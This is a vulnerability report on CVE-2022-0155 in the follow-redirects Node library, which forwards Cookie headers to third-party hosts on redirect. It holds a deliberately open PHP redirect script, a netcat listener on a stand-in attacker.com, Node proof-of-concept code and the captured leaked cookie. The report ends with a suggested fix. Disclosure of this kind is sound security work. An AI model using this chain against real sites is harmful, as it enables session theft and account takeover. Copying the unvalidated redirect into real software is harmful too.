CVE-2022-0155: Exposure of Private Personal Information to an Unauthorized Actor in follow-redirects

follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor

BUG

Cookie header is leaked to a third-party site, which allows hijacking the victim's account

SUMMARY

When fetching a remote URL with a Cookie header, if the response carries a Location header, follow-redirects follows that URL and fetches it with the same cookie. The cookie is therefore leaked to the third party.
Example: you fetch example.com with a cookie; if the response redirects to attacker.com, the redirect target is fetched with the same cookie.
So the cookie for example.com is leaked to attacker.com.
Cookies are the standard way to authenticate to a web app and must not be leaked to other sites.
All browsers follow the same-origin policy, so when a redirect happens the browser does not send example.com's cookie to attacker.com.

FLOW

If you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ it redirects to http://attacker.com:8182/ .

First set up a web server and a netcat listener.

http://mysite.com/redirect.php?url=http://attacker.com:8182/

//redirect.php (an open redirect, used here only to produce the Location response)
<?php
$url = $_GET["url"];
header("Location: $url");

/* Make sure that the code below does not get executed when we redirect. */
exit;
?>

netcat listener on http://attacker.com

nc -lnvp 8182

STEPS TO REPRODUCE

Run the code below:

const { http, https } = require('follow-redirects');
// https://github.com/follow-redirects/follow-redirects
const payload = JSON.stringify({
    name: 'John Doe',
    job: 'DevOps Specialist'
});

// Request to mysite.com; the Cookie and Authorization headers are meant for mysite.com only.
const options = {
    protocol: 'http:',
    hostname: 'mysite.com',
    port: 80,
    path: '/redirect.php?url=http://attacker.com:8182/mm',
    method: 'GET',
    headers: {
        'Content-Type': 'application/json',
        'Cookie': 'dsf=sdf',
        'Authorization': 'Basic dsfddsf'
    }
};

const req = http.request(options, (res) => {
    let body = '';

    res.on('data', (chunk) => {
        body += chunk;
    });

    res.on('end', () => {
        console.log(body);
    });

}).on('error', (err) => {
    console.log('Error: ', err.message);
});

// req.write(payload);
req.end();

Response received on the attacker's netcat listener:

Connection from 127.0.0.1 56060 received!
GET /mm HTTP/1.1
Content-Type: application/json
Cookie: dsf=sdf
Host: localhost:8182
Connection: close

As this request shows, the cookie was leaked to the third-party site attacker.com when redirecting.

So, here I provided a cookie for mysite.com, but due to the redirect it leaks to the third-party site attacker.com.

Because follow-redirects follows the redirect automatically, the user cannot control where the cookie is sent and where it is not.
If a cookie is provided, it is sent to every redirect URL, whether or not it is on the same domain.

SUGGESTED FIX

Send the Cookie header to the redirected URL only if the domain of the originally requested URL and the domain of the redirect URL are the same. If the domains differ, the redirect target is a third-party site and the Cookie header must not be sent.
